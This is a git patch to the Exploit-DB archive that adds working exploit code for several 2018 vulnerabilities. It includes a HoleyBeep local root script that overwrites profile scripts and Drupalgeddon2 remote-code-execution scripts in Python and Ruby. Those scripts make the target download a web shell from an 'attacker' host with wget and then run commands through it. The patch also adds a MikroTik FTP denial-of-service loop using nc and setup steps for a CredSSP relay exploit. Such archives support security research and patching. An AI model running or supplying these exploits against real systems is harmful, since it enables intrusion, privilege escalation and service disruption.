From bef325a7364ff8c97c02ac5dbc3814faa19a9375 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Apr 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-04-14 9 changes to exploits/shellcodes GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation Microsoft Credential Security Support Provider - Remote Code Execution WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) MikroTik 6.41.4 - FTP daemon Denial of Service PoC Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution --- exploits/linux/dos/43178.c | 3 +- exploits/linux/local/44452.py | 90 +++++++++++++++++++ exploits/linux/webapps/44450.txt | 19 ++++ .../php/webapps/{35730.txt => 35730.html} | 6 +- exploits/php/webapps/44448.py | 21 +++++ exploits/php/webapps/44449.rb | 41 +++++++++ exploits/windows/remote/44453.md | 51 +++++++++++ files_exploits.csv | 7 +- 8 files changed, 235 insertions(+), 3 deletions(-) create mode 100755 exploits/linux/local/44452.py create mode 100644 exploits/linux/webapps/44450.txt rename exploits/php/webapps/{35730.txt => 35730.html} (90%) create mode 100755 exploits/php/webapps/44448.py create mode 100755 exploits/php/webapps/44449.rb create mode 100644 exploits/windows/remote/44453.md diff --git a/exploits/linux/dos/43178.c b/exploits/linux/dos/43178.c index f4cfb32af..f36f5ded1 100644 --- a/exploits/linux/dos/43178.c +++ b/exploits/linux/dos/43178.c @@ -6,9 +6,10 @@ I found the following bug with an AFL-based fuzzer: When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace. This bug can be reproduced with the following testcase: -*/ $ cat mincore_test.c +*/ + #define _GNU_SOURCE #include #include diff --git a/exploits/linux/local/44452.py b/exploits/linux/local/44452.py new file mode 100755 index 000000000..1db741ae0 --- /dev/null +++ b/exploits/linux/local/44452.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python3 +# +# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc +# E-DB Note ~ https://sigint.sh/#/holeybeep +# +# This is an exploit for HoleyBeep. +# +# To use it, place any command you want root to execute in `/tmp/x`. +# ``` +# $ cat /tmp/x +# echo PWNED $(whoami) +# ``` +# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command. +# +# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user. +# +# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in. +# + +import argparse +import shutil +import os +import subprocess +import time +import signal +import ntpath + +TMP_PATH="beep_exploit" + +def backup_output(path): + backup_path = ntpath.basename(path + ".bak") + if os.path.isfile(path): + shutil.copy(path, backup_path) + print('Backup made at \'{}\''.format(backup_path)) + +def main(): + parser = argparse.ArgumentParser(description='Holey beep exploit script.') + parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt') + parser.add_argument('--path', default="/usr/bin/beep", help='path to beep') + parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound') + parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound') + parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file') + args = parser.parse_args() + + if not args.no_backup: + backup_output(args.output) + + devnull = open("/dev/null") + + timer = args.time_low + while True: + # Create original symlink + try: + os.remove(TMP_PATH) + except OSError: + pass + os.symlink("/dev/input/event0", TMP_PATH) + + # Open subprocess + p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull) + time.sleep(timer/2 / 1000000.0) + + # Replace symlink + try: + os.remove(TMP_PATH) + except OSError: + pass + os.symlink(args.output, TMP_PATH) + time.sleep(timer/2 / 1000000.0) + + # Trigger SIGINT + os.kill(p.pid, signal.SIGINT) + + # Kill process if it's sill alive + time.sleep(200.0 / 1000000.0) + os.kill(p.pid, signal.SIGKILL) + + # Verify result + with open(args.output, 'rb') as f: + data = f.read(4) + if data == b'/*/x': + print("Done!") + break + + timer += 1 + if timer > args.time_high: + timer = args.time_low + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/44450.txt b/exploits/linux/webapps/44450.txt new file mode 100644 index 000000000..de6ede0d4 --- /dev/null +++ b/exploits/linux/webapps/44450.txt @@ -0,0 +1,19 @@ +################ +#Title: MikroTik 6.41.4 Denial of service FTP daemon crash +#CVE: CVE-2018-10070 +#CWE: CWE-400 +#Exploit Author: Hosein Askari (FarazPajohan) +#Vendor HomePage: https://mikrotik.com/ +#Version : 6.41.4 (Released 2018-Apr-05) | All Version +#Date: 13-05-2018 +#Category: Network Appliance +#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message. +#POC: https://vimeo.com/264461602 +################ + +for i in `seq 1 100` + +do + cat craft | nc -nv 21 & + sleep 2 +done \ No newline at end of file diff --git a/exploits/php/webapps/35730.txt b/exploits/php/webapps/35730.html similarity index 90% rename from exploits/php/webapps/35730.txt rename to exploits/php/webapps/35730.html index 30f6e17d7..9033f962b 100644 --- a/exploits/php/webapps/35730.txt +++ b/exploits/php/webapps/35730.html @@ -1,3 +1,4 @@ +
@@ -24,6 +26,7 @@ Login as regular user (created using wp-login.php?action=register):
+ \ No newline at end of file diff --git a/exploits/php/webapps/44448.py b/exploits/php/webapps/44448.py new file mode 100755 index 000000000..392e2ba3a --- /dev/null +++ b/exploits/php/webapps/44448.py @@ -0,0 +1,21 @@ +#!/usr/bin/env +import sys +import requests + +print ('################################################################') +print ('# Proof-Of-Concept for CVE-2018-7600') +print ('# by Vitalii Rudnykh') +print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') +print ('# https://github.com/a2u/CVE-2018-7600') +print ('################################################################') +print ('Provided only for educational or information purposes\n') + +target = raw_input('Enter target url (example: https://domain.ltd/): ') + +url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' +payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} + +r = requests.post(url, data=payload) +if r.status_code != 200: + sys.exit("Not exploitable") +print ('\nCheck: '+target+'hello.txt') \ No newline at end of file diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb new file mode 100755 index 000000000..053f2ae56 --- /dev/null +++ b/exploits/php/webapps/44449.rb @@ -0,0 +1,41 @@ +# EDB-Note. Have the contents of "shell" on http://attacker/shell.php + +require 'net/http' + +# Hans Topo ruby port from Drupalggedon2 exploit. +# Based on Vitalii Rudnykh exploit + +target = ARGV[0] +command = ARGV[1] + +url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' + +shell = "" + +payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' + +uri = URI(url) + +http = Net::HTTP.new(uri.host,uri.port) + +if uri.scheme == 'https' + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE +end + +req = Net::HTTP::Post.new(uri.path) +req.body = payload + +response = http.request(req) + +if response.code != "200" + puts "[*] Response: " + response.code + puts "[*] Target seems not to be exploitable" + exit +end + +puts "[*] Target seems to be exploitable." + +exploit_uri = URI(target+"/sh.php?cmd=#{command}") +response = Net::HTTP.get_response(exploit_uri) +puts response.body \ No newline at end of file diff --git a/exploits/windows/remote/44453.md b/exploits/windows/remote/44453.md new file mode 100644 index 000000000..7cddd77da --- /dev/null +++ b/exploits/windows/remote/44453.md @@ -0,0 +1,51 @@ +# credssp + +This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only. +It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. + + +Written by Eyal Karni, Preempt +ekarni@preempt.com + +# Build + +## Instructions (Linux) +If you are using Ubuntu 14 , check the install file.. +It was tested on Ubuntu 16.04. + +``` +$ git clone https://github.com/preempt/rdpy.git rdpy +$ git clone https://github.com/preempt/credssp.git +$ cd credssp/install +$ sh install.sh +$ cd ../../rdpy +$ sudo python setup.py install +``` + +EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip + +* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography). +* A different version of openssl needed to be installed for this to run successfully. The install script does that. +* Please follow the instructions in the described order. + +# Running the exploit + + +Export a certificate suitable for Server Authentication from any domain. + + +To generate a suitable certificate for the command to execute : + +``` +$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD +``` + +(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively) + +To run the attack script: + +``` +$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer +``` + +More details are in the usage section of the scripts(--help). \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 06a3f771d..ceac200e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9642,6 +9642,7 @@ id,file,description,date,author,type,platform,port 44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows, 44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux, 44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86, +44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16390,6 +16391,7 @@ id,file,description,date,author,type,platform,port 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android, 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware, +44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -34877,7 +34879,7 @@ id,file,description,date,author,type,platform,port 35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php, 35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php, 35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp, -35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80 +35730,exploits/php/webapps/35730.html,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80 35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80 35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php, 35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php, @@ -39143,3 +39145,6 @@ id,file,description,date,author,type,platform,port 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php, 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php, 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php, +44448,exploits/php/webapps/44448.py,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php, +44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux, +44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,